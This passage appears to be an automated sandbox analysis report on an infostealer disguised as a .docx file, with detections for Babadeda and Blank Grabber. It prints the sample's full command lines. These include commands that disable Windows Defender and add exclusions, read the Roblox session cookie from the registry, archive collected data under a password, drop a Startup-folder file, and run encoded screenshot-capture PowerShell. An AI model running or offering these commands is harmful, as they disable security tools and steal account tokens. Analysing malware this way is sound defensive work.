gBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
              • csc.exe (PID: 7340 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                • cvtres.exe (PID: 2252 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 1820 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • getmac.exe (PID: 7332 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
          • cmd.exe (PID: 7908 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 3492 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 7932 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
            • Conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 2344 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 5268 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • attrib.exe (PID: 8160 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • cmd.exe (PID: 8148 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 1404 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7664 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
          • cmd.exe (PID: 5680 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7712 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tree.com (PID: 1988 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
          • cmd.exe (PID: 7732 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1608 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 2316 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Calculator.exe (PID: 5544 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 94675EB54AC5DAA11ACE736DBFA9E7A2)
  • svchost.exe (PID: 4484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabadedaAccording to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
No configs have been found
SourceRuleDescriptionAuthorStrings
Cooperative Agreement0000800380.docx.exeJoeSecurity_BabadedaYara detected BabadedaJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI43362\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      SourceRuleDescriptionAuthorStrings
      00000011.00000002.2375978136.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000010.00000003.2023955880.0000025C3C156000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000011.00000003.2371288192.0000016E17EE2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000011.00000003.2047634616.0000016E172E5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000011.00000003.2367455038.0000016E17B2C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                Click to see the 10 entries
                SourceRuleDescriptionAuthorStrings
                0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security
                  0.0.Cooperative Agreement0000800380.docx.exe.400000.0.unpackJoeSecurity_BabadedaYara detected BabadedaJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", CommandLine: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, NewProcessName: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, OriginalFileName: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe", ProcessId: 6808, ProcessName: Cooperative Agreement0000800380.docx.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", ProcessId: 7264, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7272, ProcessName: cmd.exe
                    Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *", ProcessId: 2316, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7264, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe', ProcessId: 7448, ProcessName: powershell.exe
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbg